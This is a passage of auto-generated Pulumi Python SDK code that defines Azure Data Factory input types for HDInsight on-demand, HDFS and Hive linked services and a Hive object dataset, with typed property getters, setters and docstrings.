"""
The customer’s subscription to host the cluster. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "host_subscription_id")
@host_subscription_id.setter
def host_subscription_id(self, value: Any):
pulumi.set(self, "host_subscription_id", value)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Azure Storage linked service to be used by the on-demand cluster for storing and processing data.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def tenant(self) -> Any:
"""
The Tenant id/name to which the service principal belongs. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "tenant")
@tenant.setter
def tenant(self, value: Any):
pulumi.set(self, "tenant", value)
@property
@pulumi.getter(name="timeToLive")
def time_to_live(self) -> Any:
"""
The allowed idle time for the on-demand HDInsight cluster. Specifies how long the on-demand HDInsight cluster stays alive after completion of an activity run if there are no other active jobs in the cluster. The minimum value is 5 mins. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "time_to_live")
@time_to_live.setter
def time_to_live(self, value: Any):
pulumi.set(self, "time_to_live", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def version(self) -> Any:
"""
Version of the HDInsight cluster. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Any):
pulumi.set(self, "version", value)
@property
@pulumi.getter(name="additionalLinkedServiceNames")
def additional_linked_service_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['LinkedServiceReferenceArgs']]]]:
"""
Specifies additional storage accounts for the HDInsight linked service so that the Data Factory service can register them on your behalf.
"""
return pulumi.get(self, "additional_linked_service_names")
@additional_linked_service_names.setter
def additional_linked_service_names(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['LinkedServiceReferenceArgs']]]]):
pulumi.set(self, "additional_linked_service_names", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="clusterNamePrefix")
def cluster_name_prefix(self) -> Optional[Any]:
"""
The prefix of cluster name, postfix will be distinct with timestamp. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "cluster_name_prefix")
@cluster_name_prefix.setter
def cluster_name_prefix(self, value: Optional[Any]):
pulumi.set(self, "cluster_name_prefix", value)
@property
@pulumi.getter(name="clusterPassword")
def cluster_password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password to access the cluster.
"""
return pulumi.get(self, "cluster_password")
@cluster_password.setter
def cluster_password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "cluster_password", value)
@property
@pulumi.getter(name="clusterSshPassword")
def cluster_ssh_password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password to SSH remotely connect cluster’s node (for Linux).
"""
return pulumi.get(self, "cluster_ssh_password")
@cluster_ssh_password.setter
def cluster_ssh_password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "cluster_ssh_password", value)
@property
@pulumi.getter(name="clusterSshUserName")
def cluster_ssh_user_name(self) -> Optional[Any]:
"""
The username to SSH remotely connect to cluster’s node (for Linux). Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "cluster_ssh_user_name")
@cluster_ssh_user_name.setter
def cluster_ssh_user_name(self, value: Optional[Any]):
pulumi.set(self, "cluster_ssh_user_name", value)
@property
@pulumi.getter(name="clusterType")
def cluster_type(self) -> Optional[Any]:
"""
The cluster type. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "cluster_type")
@cluster_type.setter
def cluster_type(self, value: Optional[Any]):
pulumi.set(self, "cluster_type", value)
@property
@pulumi.getter(name="clusterUserName")
def cluster_user_name(self) -> Optional[Any]:
"""
The username to access the cluster. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "cluster_user_name")
@cluster_user_name.setter
def cluster_user_name(self, value: Optional[Any]):
pulumi.set(self, "cluster_user_name", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter(name="coreConfiguration")
def core_configuration(self) -> Optional[Any]:
"""
Specifies the core configuration parameters (as in core-site.xml) for the HDInsight cluster to be created.
"""
return pulumi.get(self, "core_configuration")
@core_configuration.setter
def core_configuration(self, value: Optional[Any]):
pulumi.set(self, "core_configuration", value)
@property
@pulumi.getter(name="dataNodeSize")
def data_node_size(self) -> Optional[Any]:
"""
Specifies the size of the data node for the HDInsight cluster.
"""
return pulumi.get(self, "data_node_size")
@data_node_size.setter
def data_node_size(self, value: Optional[Any]):
pulumi.set(self, "data_node_size", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="hBaseConfiguration")
def h_base_configuration(self) -> Optional[Any]:
"""
Specifies the HBase configuration parameters (hbase-site.xml) for the HDInsight cluster.
"""
return pulumi.get(self, "h_base_configuration")
@h_base_configuration.setter
def h_base_configuration(self, value: Optional[Any]):
pulumi.set(self, "h_base_configuration", value)
@property
@pulumi.getter(name="hcatalogLinkedServiceName")
def hcatalog_linked_service_name(self) -> Optional[pulumi.Input['LinkedServiceReferenceArgs']]:
"""
The name of Azure SQL linked service that point to the HCatalog database. The on-demand HDInsight cluster is created by using the Azure SQL database as the metastore.
"""
return pulumi.get(self, "hcatalog_linked_service_name")
@hcatalog_linked_service_name.setter
def hcatalog_linked_service_name(self, value: Optional[pulumi.Input['LinkedServiceReferenceArgs']]):
pulumi.set(self, "hcatalog_linked_service_name", value)
@property
@pulumi.getter(name="hdfsConfiguration")
def hdfs_configuration(self) -> Optional[Any]:
"""
Specifies the HDFS configuration parameters (hdfs-site.xml) for the HDInsight cluster.
"""
return pulumi.get(self, "hdfs_configuration")
@hdfs_configuration.setter
def hdfs_configuration(self, value: Optional[Any]):
pulumi.set(self, "hdfs_configuration", value)
@property
@pulumi.getter(name="headNodeSize")
def head_node_size(self) -> Optional[Any]:
"""
Specifies the size of the head node for the HDInsight cluster.
"""
return pulumi.get(self, "head_node_size")
@head_node_size.setter
def head_node_size(self, value: Optional[Any]):
pulumi.set(self, "head_node_size", value)
@property
@pulumi.getter(name="hiveConfiguration")
def hive_configuration(self) -> Optional[Any]:
"""
Specifies the hive configuration parameters (hive-site.xml) for the HDInsight cluster.
"""
return pulumi.get(self, "hive_configuration")
@hive_configuration.setter
def hive_configuration(self, value: Optional[Any]):
pulumi.set(self, "hive_configuration", value)
@property
@pulumi.getter(name="mapReduceConfiguration")
def map_reduce_configuration(self) -> Optional[Any]:
"""
Specifies the MapReduce configuration parameters (mapred-site.xml) for the HDInsight cluster.
"""
return pulumi.get(self, "map_reduce_configuration")
@map_reduce_configuration.setter
def map_reduce_configuration(self, value: Optional[Any]):
pulumi.set(self, "map_reduce_configuration", value)
@property
@pulumi.getter(name="oozieConfiguration")
def oozie_configuration(self) -> Optional[Any]:
"""
Specifies the Oozie configuration parameters (oozie-site.xml) for the HDInsight cluster.
"""
return pulumi.get(self, "oozie_configuration")
@oozie_configuration.setter
def oozie_configuration(self, value: Optional[Any]):
pulumi.set(self, "oozie_configuration", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="servicePrincipalId")
def service_principal_id(self) -> Optional[Any]:
"""
The service principal id for the hostSubscriptionId. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "service_principal_id")
@service_principal_id.setter
def service_principal_id(self, value: Optional[Any]):
pulumi.set(self, "service_principal_id", value)
@property
@pulumi.getter(name="servicePrincipalKey")
def service_principal_key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The key for the service principal id.
"""
return pulumi.get(self, "service_principal_key")
@service_principal_key.setter
def service_principal_key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "service_principal_key", value)
@property
@pulumi.getter(name="sparkVersion")
def spark_version(self) -> Optional[Any]:
"""
The version of spark if the cluster type is 'spark'. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "spark_version")
@spark_version.setter
def spark_version(self, value: Optional[Any]):
pulumi.set(self, "spark_version", value)
@property
@pulumi.getter(name="stormConfiguration")
def storm_configuration(self) -> Optional[Any]:
"""
Specifies the Storm configuration parameters (storm-site.xml) for the HDInsight cluster.
"""
return pulumi.get(self, "storm_configuration")
@storm_configuration.setter
def storm_configuration(self, value: Optional[Any]):
pulumi.set(self, "storm_configuration", value)
@property
@pulumi.getter(name="yarnConfiguration")
def yarn_configuration(self) -> Optional[Any]:
"""
Specifies the Yarn configuration parameters (yarn-site.xml) for the HDInsight cluster.
"""
return pulumi.get(self, "yarn_configuration")
@yarn_configuration.setter
def yarn_configuration(self, value: Optional[Any]):
pulumi.set(self, "yarn_configuration", value)
@property
@pulumi.getter(name="zookeeperNodeSize")
def zookeeper_node_size(self) -> Optional[Any]:
"""
Specifies the size of the Zoo Keeper node for the HDInsight cluster.
"""
return pulumi.get(self, "zookeeper_node_size")
@zookeeper_node_size.setter
def zookeeper_node_size(self, value: Optional[Any]):
pulumi.set(self, "zookeeper_node_size", value)
@pulumi.input_type
class HdfsLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
url: Any,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
authentication_type: Optional[Any] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
user_name: Optional[Any] = None):
"""
Hadoop Distributed File System (HDFS) linked service.
:param pulumi.Input[str] type: Type of linked service.
:param Any url: The URL of the HDFS service endpoint, e.g. http://myhostname:50070/webhdfs/v1 . Type: string (or Expression with resultType string).
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param Any authentication_type: Type of authentication used to connect to the HDFS. Possible values are: Anonymous and Windows. Type: string (or Expression with resultType string).
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password for Windows authentication.
:param Any user_name: User name for Windows authentication. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "type", 'Hdfs')
pulumi.set(__self__, "url", url)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def url(self) -> Any:
"""
The URL of the HDFS service endpoint, e.g. http://myhostname:50070/webhdfs/v1 . Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Any):
pulumi.set(self, "url", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[Any]:
"""
Type of authentication used to connect to the HDFS. Possible values are: Anonymous and Windows. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[Any]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password for Windows authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[Any]:
"""
User name for Windows authentication. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[Any]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class HiveLinkedServiceArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
host: Any,
type: pulumi.Input[str],
allow_host_name_cn_mismatch: Optional[Any] = None,
allow_self_signed_server_cert: Optional[Any] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enable_ssl: Optional[Any] = None,
encrypted_credential: Optional[Any] = None,
http_path: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
server_type: Optional[pulumi.Input[str]] = None,
service_discovery_mode: Optional[Any] = None,
thrift_transport_protocol: Optional[pulumi.Input[str]] = None,
trusted_cert_path: Optional[Any] = None,
use_native_query: Optional[Any] = None,
use_system_trust_store: Optional[Any] = None,
username: Optional[Any] = None,
zoo_keeper_name_space: Optional[Any] = None):
"""
Hive Server linked service.
:param pulumi.Input[str] authentication_type: The authentication method used to access the Hive server.
:param Any host: IP address or host name of the Hive server, separated by ';' for multiple hosts (only when serviceDiscoveryMode is enable).
:param pulumi.Input[str] type: Type of linked service.
:param Any allow_host_name_cn_mismatch: Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
:param Any allow_self_signed_server_cert: Specifies whether to allow self-signed certificates from the server. The default value is false.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any enable_ssl: Specifies whether the connections to the server are encrypted using SSL. The default value is false.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param Any http_path: The partial URL corresponding to the Hive server.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password corresponding to the user name that you provided in the Username field
:param Any port: The TCP port that the Hive server uses to listen for client connections.
:param pulumi.Input[str] server_type: The type of Hive server.
:param Any service_discovery_mode: true to indicate using the ZooKeeper service, false not.
:param pulumi.Input[str] thrift_transport_protocol: The transport protocol to use in the Thrift layer.
:param Any trusted_cert_path: The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
:param Any use_native_query: Specifies whether the driver uses native HiveQL queries,or converts them into an equivalent form in HiveQL.
:param Any use_system_trust_store: Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
:param Any username: The user name that you use to access Hive Server.
:param Any zoo_keeper_name_space: The namespace on ZooKeeper under which Hive Server 2 nodes are added.
"""
pulumi.set(__self__, "authentication_type", authentication_type)
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'Hive')
if allow_host_name_cn_mismatch is not None:
pulumi.set(__self__, "allow_host_name_cn_mismatch", allow_host_name_cn_mismatch)
if allow_self_signed_server_cert is not None:
pulumi.set(__self__, "allow_self_signed_server_cert", allow_self_signed_server_cert)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if enable_ssl is not None:
pulumi.set(__self__, "enable_ssl", enable_ssl)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if http_path is not None:
pulumi.set(__self__, "http_path", http_path)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if server_type is not None:
pulumi.set(__self__, "server_type", server_type)
if service_discovery_mode is not None:
pulumi.set(__self__, "service_discovery_mode", service_discovery_mode)
if thrift_transport_protocol is not None:
pulumi.set(__self__, "thrift_transport_protocol", thrift_transport_protocol)
if trusted_cert_path is not None:
pulumi.set(__self__, "trusted_cert_path", trusted_cert_path)
if use_native_query is not None:
pulumi.set(__self__, "use_native_query", use_native_query)
if use_system_trust_store is not None:
pulumi.set(__self__, "use_system_trust_store", use_system_trust_store)
if username is not None:
pulumi.set(__self__, "username", username)
if zoo_keeper_name_space is not None:
pulumi.set(__self__, "zoo_keeper_name_space", zoo_keeper_name_space)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
The authentication method used to access the Hive server.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter
def host(self) -> Any:
"""
IP address or host name of the Hive server, separated by ';' for multiple hosts (only when serviceDiscoveryMode is enable).
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="allowHostNameCNMismatch")
def allow_host_name_cn_mismatch(self) -> Optional[Any]:
"""
Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
"""
return pulumi.get(self, "allow_host_name_cn_mismatch")
@allow_host_name_cn_mismatch.setter
def allow_host_name_cn_mismatch(self, value: Optional[Any]):
pulumi.set(self, "allow_host_name_cn_mismatch", value)
@property
@pulumi.getter(name="allowSelfSignedServerCert")
def allow_self_signed_server_cert(self) -> Optional[Any]:
"""
Specifies whether to allow self-signed certificates from the server. The default value is false.
"""
return pulumi.get(self, "allow_self_signed_server_cert")
@allow_self_signed_server_cert.setter
def allow_self_signed_server_cert(self, value: Optional[Any]):
pulumi.set(self, "allow_self_signed_server_cert", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="enableSsl")
def enable_ssl(self) -> Optional[Any]:
"""
Specifies whether the connections to the server are encrypted using SSL. The default value is false.
"""
return pulumi.get(self, "enable_ssl")
@enable_ssl.setter
def enable_ssl(self, value: Optional[Any]):
pulumi.set(self, "enable_ssl", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="httpPath")
def http_path(self) -> Optional[Any]:
"""
The partial URL corresponding to the Hive server.
"""
return pulumi.get(self, "http_path")
@http_path.setter
def http_path(self, value: Optional[Any]):
pulumi.set(self, "http_path", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password corresponding to the user name that you provided in the Username field
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The TCP port that the Hive server uses to listen for client connections.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="serverType")
def server_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of Hive server.
"""
return pulumi.get(self, "server_type")
@server_type.setter
def server_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_type", value)
@property
@pulumi.getter(name="serviceDiscoveryMode")
def service_discovery_mode(self) -> Optional[Any]:
"""
true to indicate using the ZooKeeper service, false not.
"""
return pulumi.get(self, "service_discovery_mode")
@service_discovery_mode.setter
def service_discovery_mode(self, value: Optional[Any]):
pulumi.set(self, "service_discovery_mode", value)
@property
@pulumi.getter(name="thriftTransportProtocol")
def thrift_transport_protocol(self) -> Optional[pulumi.Input[str]]:
"""
The transport protocol to use in the Thrift layer.
"""
return pulumi.get(self, "thrift_transport_protocol")
@thrift_transport_protocol.setter
def thrift_transport_protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "thrift_transport_protocol", value)
@property
@pulumi.getter(name="trustedCertPath")
def trusted_cert_path(self) -> Optional[Any]:
"""
The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
"""
return pulumi.get(self, "trusted_cert_path")
@trusted_cert_path.setter
def trusted_cert_path(self, value: Optional[Any]):
pulumi.set(self, "trusted_cert_path", value)
@property
@pulumi.getter(name="useNativeQuery")
def use_native_query(self) -> Optional[Any]:
"""
Specifies whether the driver uses native HiveQL queries,or converts them into an equivalent form in HiveQL.
"""
return pulumi.get(self, "use_native_query")
@use_native_query.setter
def use_native_query(self, value: Optional[Any]):
pulumi.set(self, "use_native_query", value)
@property
@pulumi.getter(name="useSystemTrustStore")
def use_system_trust_store(self) -> Optional[Any]:
"""
Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
"""
return pulumi.get(self, "use_system_trust_store")
@use_system_trust_store.setter
def use_system_trust_store(self, value: Optional[Any]):
pulumi.set(self, "use_system_trust_store", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
The user name that you use to access Hive Server.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="zooKeeperNameSpace")
def zoo_keeper_name_space(self) -> Optional[Any]:
"""
The namespace on ZooKeeper under which Hive Server 2 nodes are added.
"""
return pulumi.get(self, "zoo_keeper_name_space")
@zoo_keeper_name_space.setter
def zoo_keeper_name_space(self, value: Optional[Any]):
pulumi.set(self, "zoo_keeper_name_space", value)
@pulumi.input_type
class HiveObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Hive Server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'HiveObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
